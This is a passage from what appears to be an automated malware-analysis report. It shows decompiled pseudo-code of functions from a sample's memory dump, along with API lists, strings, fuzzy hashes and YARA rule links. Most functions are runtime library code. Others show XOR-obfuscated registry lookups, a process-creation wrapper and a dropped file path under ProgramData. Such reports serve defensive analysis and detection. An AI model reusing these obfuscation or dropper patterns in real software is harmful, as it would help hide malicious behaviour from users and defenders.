							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E00B635A0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E00B564B8( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E00B564B8(_t285);
						goto L31;
					}
				} else {
					_t220 = E00B55BBD();
					_t299 = 0x16;
					 *_t220 = _t299;
					E00B528EC();
					L31:
					return _t299;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 00B59B8D

Strings

*?, xrefs: 00B59A36

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: cb11d0fc08ca0388d849648d49bfdbe11149502652744f38d8d31ef761cb07a6
Instruction ID: a565a12b500b8cf921e9fc245eb87bf9d80302df92c4a57fbb5e0d512df3660b
Opcode Fuzzy Hash: cb11d0fc08ca0388d849648d49bfdbe11149502652744f38d8d31ef761cb07a6
Instruction Fuzzy Hash: F4611975E00219DFDB14CFA9D8816ADFBF5EF48311B2481EAE815E7300D675AE458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5312D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B5312D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				intOrPtr* _t57;
				signed int _t63;
				intOrPtr _t65;

				_t48 = _a4;
				if(_t48 != 0) {
					if(_t48 == 2 || _t48 == 1) {
						E00B5A638();
						E00B5A085(0, 0xb6a408, 0x104);
						_t26 =  *0xb6a530; // 0x7c33c8
						 *0xb6a520 = 0xb6a408;
						_v20 = _t26;
						if(_t26 == 0 ||  *_t26 == 0) {
							_t26 = 0xb6a408;
							_v20 = 0xb6a408;
						}
						_v8 = 0;
						_v16 = 0;
						_t63 = E00B533DE(E00B53265( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
						if(_t63 != 0) {
							E00B53265( &_v8, _v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
							if(_t48 != 1) {
								_v12 = 0;
								_push( &_v12);
								_t49 = E00B59FB3(_t48, 0, _t63, _t63);
								if(_t49 == 0) {
									_t57 = _v12;
									_t54 = 0;
									_t36 = _t57;
									if( *_t57 == 0) {
										L17:
										_t37 = 0;
										 *0xb6a524 = _t54;
										_v12 = 0;
										_t49 = 0;
										 *0xb6a528 = _t57;
										L18:
										E00B564B8(_t37);
										_v12 = 0;
										goto L19;
									} else {
										goto L16;
									}
									do {
										L16:
										_t36 = _t36 + 4;
										_t54 = _t54 + 1;
									} while ( *_t36 != 0);
									goto L17;
								}
								_t37 = _v12;
								goto L18;
							}
							 *0xb6a524 = _v8 - 1;
							_t43 = _t63;
							_t63 = 0;
							 *0xb6a528 = _t43;
							goto L12;
						} else {
							_t44 = E00B55BBD();
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L12:
							_t49 = 0;
							L19:
							E00B564B8(_t63);
							_t40 = _t49;
							goto L20;
						}
					} else {
						_t45 = E00B55BBD();
						_t65 = 0x16;
						 *_t45 = _t65;
						E00B528EC();
						_t40 = _t65;
						L20:
						return _t40;
					}
				}
				return 0;
			}

Strings

C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe, xrefs: 00B53170, 00B53177, 00B531AD
`Q|, xrefs: 00B53202, 00B53245

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe$`Q|
API String ID: 0-2653146329
Opcode ID: 7ce6813915628b2f7665492541ad890a833e63d2466e3d4998d9a2fc4c7adf6b
Instruction ID: 02310d3229f94a6b4d57073ab50967581eb893d6a5e8e042e055ac31dc8d6865
Opcode Fuzzy Hash: 7ce6813915628b2f7665492541ad890a833e63d2466e3d4998d9a2fc4c7adf6b
Instruction Fuzzy Hash: 2B41B471A00608AFCB21DF998C85B9EBBF8EF94751F1000EAED05E7350DAB58B49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B42861, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B42861(void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v27;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v104;
				void* _v108;
				signed int _t25;
				void* _t33;
				void _t34;
				void _t35;
				void* _t43;
				signed int _t47;
				void* _t54;
				signed int _t55;
				intOrPtr _t57;
				void* _t58;
				void* _t65;
				signed int _t67;

				_t25 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t25 ^ _t67;
				asm("movaps xmm0, [0xb3dec0]");
				_t43 = 0;
				asm("movups [ebp-0x64], xmm0");
				asm("movaps xmm0, [0xb3db00]");
				_t57 = _a4;
				asm("movups [ebp-0x54], xmm0");
				_v40 = 0xe4edeec7;
				asm("movaps xmm0, [0xb3db10]");
				asm("movups [ebp-0x44], xmm0");
				_v36 = 0xc4a6e0e8;
				asm("movaps xmm0, [0xb3dc30]");
				asm("movups [ebp-0x34], xmm0");
				_v32 = 0xe6e5fbe0;
				_v28 = 0xe9;
				do {
					_t7 = _t43 + 0x40; // 0x40
					 *(_t67 + _t43 - 0x64) =  *(_t67 + _t43 - 0x64) ^ _t7;
					_t43 = _t43 + 1;
				} while (_t43 < 0x4d);
				_v27 = 0;
				if(RegOpenKeyA(0x80000002,  &_v104,  &_v108) == 0) {
					asm("movaps xmm0, [0xb3dab0]");
					_push(_t43);
					asm("movups [ebp-0x14], xmm0");
					E00B42CCF( &_v24, _v108, E00B42D2B( &_v24), _t57);
					_v20 = 0x312a221c;
					_v16 = 0x6923282b;
					_v12 = 0x2f312d;
					_t33 = E00B427DA( &_v20);
					_t54 = _t33;
					_t65 = _t33;
					do {
						_t34 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t34 != 0);
					_t55 = _t54 - _t65;
					_t58 = _t57 - 1;
					do {
						_t35 =  *(_t58 + 1);
						_t58 = _t58 + 1;
					} while (_t35 != 0);
					_t47 = _t55 >> 2;
					memcpy(_t58, _t65, _t47 << 2);
					memcpy(_t65 + _t47 + _t47, _t65, _t55 & 0x00000003);
					RegCloseKey(_v108);
				} else {
				}
				return E00B4AE43(_v8 ^ _t67);
			}

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

Part of subcall function 00B42CCF: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00B42909,?,00000000,?), ref: 00B42CEB

RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B4294D

Strings

+(#i, xrefs: 00B42913
-1/, xrefs: 00B4291A

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: +(#i$-1/
API String ID: 3677997916-1514103559
Opcode ID: a69af031a29e977e1ed0aef2e225c12367e74bce258756f9506f5825dc8a542e
Instruction ID: 2911f4960280917ca233baa0313adecb6af9a4a3fc1bb08931e0b046ce5c1f2a
Opcode Fuzzy Hash: a69af031a29e977e1ed0aef2e225c12367e74bce258756f9506f5825dc8a542e
Instruction Fuzzy Hash: 7031CD60D042499ADB01CFA8D9116FEFBF4FF69308F905258E846B7121EF306B86E761

Uniqueness

Uniqueness Score: -1.00%

Function 00B43475, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B43475(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _t41;
				signed int* _t58;
				signed int* _t60;
				void* _t75;
				signed int* _t76;

				_t75 = __ecx;
				E00B4B97D(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				if(_a4 == 0) {
					_t58 =  &_v16;
					E00B43434(_t58, "bad locale name");
					E00B4D24A( &_v16, 0xb664a4);
					asm("int3");
					_push(_t75);
					_t76 = _t58;
					E00B4BD26(_t58, _t76);
					if(_t76[0xb] != 0) {
						E00B50985(_t76[0xb]);
					}
					_t76[0xb] = 0;
					if(_t76[9] != 0) {
						E00B50985(_t76[9]);
					}
					_t76[9] = 0;
					if(_t76[7] != 0) {
						E00B50985(_t76[7]);
					}
					_t76[7] = 0;
					if(_t76[5] != 0) {
						E00B50985(_t76[5]);
					}
					_t76[5] = 0;
					if(_t76[3] != 0) {
						E00B50985(_t76[3]);
					}
					_t76[3] = 0;
					if(_t76[1] != 0) {
						E00B50985(_t76[1]);
					}
					_t76[1] = 0;
					_t60 = _t76;
					_t41 =  *_t60;
					if(_t41 == 0) {
						return E00B5536B(4);
					} else {
						if(_t41 < 8) {
							return E00B4C23B(0xb6a0a0 + _t41 * 0x18, 0xb6a0a0 + _t41 * 0x18);
						}
						return _t41;
					}
				} else {
					E00B4BCDB(__ecx, __ecx, _a4);
					return _t75;
				}
			}

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B43482
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B434B8

Part of subcall function 00B4BCDB: _Yarn.LIBCPMT ref: 00B4BCFA
Part of subcall function 00B4BCDB: _Yarn.LIBCPMT ref: 00B4BD1E

__CxxThrowException@8.LIBVCRUNTIME ref: 00B434DD

Strings

bad locale name, xrefs: 00B434C7

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 89ae09be524336767b97a6f21db98ee00bfb6d9cba4dd15e75429e34c9bab649
Instruction ID: 2b04f989d176cefb20af15341b31f01f57614e2ab55dea7151b602185398cec2
Opcode Fuzzy Hash: 89ae09be524336767b97a6f21db98ee00bfb6d9cba4dd15e75429e34c9bab649
Instruction Fuzzy Hash: 7E018671505744AFC321DFBA9481887FBE8BE1875079489AEE1DEC3A12D770F604CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00B43AC3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B43B0D

Strings

ios_base::eofbit set, xrefs: 00B43AE4
ios_base::failbit set, xrefs: 00B43ADF, 00B43B13
ios_base::badbit set, xrefs: 00B43AD4, 00B43AF5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: d1a6980c39a8b5acba37c8e56e55afb71f2be3aec69729431fe17ce600fc835c
Instruction ID: e98a63b64da4b0d6a8e2b40ffcc850e7ad5b8ff5fad6a61714fc5f458a494f11
Opcode Fuzzy Hash: d1a6980c39a8b5acba37c8e56e55afb71f2be3aec69729431fe17ce600fc835c
Instruction Fuzzy Hash: FFF0906290432C72DB14AA50EC82FDE7AE8DB14B40F2845E8FD8666191D6A09B44A3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B640BE, Relevance: 6.1, APIs: 4, Instructions: 133
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B640BE(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				int _t34;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				intOrPtr* _t43;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00B64071( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00B55BBD()));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00B572D3(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if((_t31 & _t58) == 0xffffffff) {
							goto L28;
						}
						_t34 = SetEndOfFile(E00B5B205(_t50));
						__eflags = _t34;
						if(_t34 != 0) {
							L18:
							_t59 = 0;
							L29:
							E00B572D3(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xd;
						_t36 = E00B55BAA();
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00B598AF(0x1000, 1);
						_pop(_t54);
						if(_t38 != 0) {
							_v12 = E00B537CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00B62B23(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(_t42 == 0xffffffff) {
										_t43 = E00B55BAA();
										__eflags =  *_t43 - 5;
										if( *_t43 == 5) {
											 *((intOrPtr*)(E00B55BBD())) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00B55BBD()));
										E00B564B8(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00B537CE(_t56, _t50, _v12);
							E00B564B8(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

APIs

_free.LIBCMT ref: 00B6418E
_free.LIBCMT ref: 00B641B7
SetEndOfFile.KERNEL32(00000000,00B61DBD,00000000,00B5892B,?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000), ref: 00B641E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000,?,?,?,?,00000000), ref: 00B64205

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 8ef6f5f787e37df1cc6c5016777c4a5608739313e469e2cd7f369bf6399bc555
Instruction ID: b16e1182c33a568e9ca160cedfa427e1d3be451392f3ae004efdacc18f5bf796
Opcode Fuzzy Hash: 8ef6f5f787e37df1cc6c5016777c4a5608739313e469e2cd7f369bf6399bc555
Instruction Fuzzy Hash: 8141C572900A099BDB21AFA8CC46B9E3BF5EF56761F2401D1F924F7291EB7CC8844760

Uniqueness

Uniqueness Score: -1.00%

Function 00B61292, Relevance: 6.1, APIs: 4, Instructions: 90
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61292(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, intOrPtr _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				char _v76;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				void* _t56;
				WCHAR* _t60;

				_t56 = __ecx;
				_t55 = 0;
				_t60 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = E00B55F7B(_t56, _a4,  &_v76, E00B56E67(__eflags));
				_t66 = _t43;
				if(_t43 == 0 && E00B55F7B(_t56, _a8,  &_v52, E00B56E67(_t66)) == 0) {
					_t68 = _a32;
					if(_a32 == 0) {
						L5:
						_t55 = CreateProcessW(_v68, _v44, _a12, _a16, _a20, _a24, _a28, _t55, _a36, _a40);
					} else {
						_t54 = E00B55F7B(_t56, _a32,  &_v28, E00B56E67(_t68));
						_t60 = _v20;
						if(_t54 == 0) {
							_t55 = _t60;
							goto L5;
						}
					}
				}
				if(_v8 != 0) {
					E00B564B8(_t60);
				}
				if(_v32 != 0) {
					E00B564B8(_v44);
				}
				if(_v56 != 0) {
					E00B564B8(_v68);
				}
				return _t55;
			}

APIs

CreateProcessW.KERNEL32 ref: 00B61347
_free.LIBCMT ref: 00B61356
_free.LIBCMT ref: 00B61365
_free.LIBCMT ref: 00B61374

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CreateProcess
String ID:
API String ID: 1318292368-0
Opcode ID: 8a2d956b05a5eaa48eee9375ce7c339d55158cc543974fbc503ff51f55c2067f
Instruction ID: d35880490adda1be497933f2e34576433cb77927d0b2cb602a43e394e7c0a445
Opcode Fuzzy Hash: 8a2d956b05a5eaa48eee9375ce7c339d55158cc543974fbc503ff51f55c2067f
Instruction Fuzzy Hash: D231EBB2C01258AFCF11AF99D881ADEBFF9FF08315F9841AAF908B2211D6354955CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B59924, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B59924(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00B5A975(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00B5A975(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(_t17 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00B55B87(GetLastError());
									_t19 =  *((intOrPtr*)(E00B55BBD()));
								}
								L14:
								return _t19;
							}
							_t19 = E00B59EF0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00B55B87(GetLastError());
						return  *((intOrPtr*)(E00B55BBD()));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00B59EF0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00B55F9A(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 00B55F9A: _free.LIBCMT ref: 00B55FA8

Part of subcall function 00B5A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00B592F5,?,00000000,00000000), ref: 00B5AA17

GetLastError.KERNEL32 ref: 00B5998C
__dosmaperr.LIBCMT ref: 00B59993
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00B599D2
__dosmaperr.LIBCMT ref: 00B599D9

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction ID: 77722598bce5edc114ee1278fa956b2e6e290f8ca5e4322754606e974d58f8e0
Opcode Fuzzy Hash: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction Fuzzy Hash: 3021B271604619EF9B20AFA18C81A6AB7EDEF0536671041DDFD6893140EB35EC488BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B58464, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B58464() {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t17;
				long _t20;

				_t20 = GetLastError();
				_t2 =  *0xb69310; // 0x7
				_t23 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00B5DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t17 = E00B598AF(1, 0x364);
						__eflags = _t17;
						if(__eflags != 0) {
							__eflags = E00B5DBB7(__eflags,  *0xb69310, _t17);
							if(__eflags != 0) {
								E00B58137(_t20, _t17, 0xb6a8cc);
								E00B564B8(0);
								goto L13;
							} else {
								_t13 = 0;
								E00B5DBB7(__eflags,  *0xb69310, 0);
								_push(_t17);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00B5DBB7(0,  *0xb69310, 0);
							_push(0);
							L9:
							E00B564B8();
							goto L4;
						}
					}
				} else {
					_t17 = E00B5DB78(_t23, _t2);
					if(_t17 == 0) {
						_t2 =  *0xb69310; // 0x7
						goto L6;
					} else {
						if(_t17 != 0xffffffff) {
							L13:
							_t13 = _t17;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t17 = _t13;
						}
					}
				}
				SetLastError(_t20);
				asm("sbb edi, edi");
				return  ~_t17 & _t13;
			}

APIs

GetLastError.KERNEL32(?,00000104,?,00B55BC2,00B56F5F,?,?,00B48FAA,00000104), ref: 00B58469
_free.LIBCMT ref: 00B584C6
_free.LIBCMT ref: 00B584FC
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000104,?,00B55BC2,00B56F5F,?,?,00B48FAA,00000104), ref: 00B58507

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e9646c58d4601cac842701c12b2845ccb45ccf8ae13f0204896a30dda64651b7
Instruction ID: 7e3eb8fbb970a5e19310b757852dca9e988906cb3e4efbb693c8cf0f3df71433
Opcode Fuzzy Hash: e9646c58d4601cac842701c12b2845ccb45ccf8ae13f0204896a30dda64651b7
Instruction Fuzzy Hash: B011A5322046016BDB612775AC85F2A26DEEBC17B7B2507E4FE24B33E1DEB58C1D8520

Uniqueness

Uniqueness Score: -1.00%

Function 00B4766E, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B4766E(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
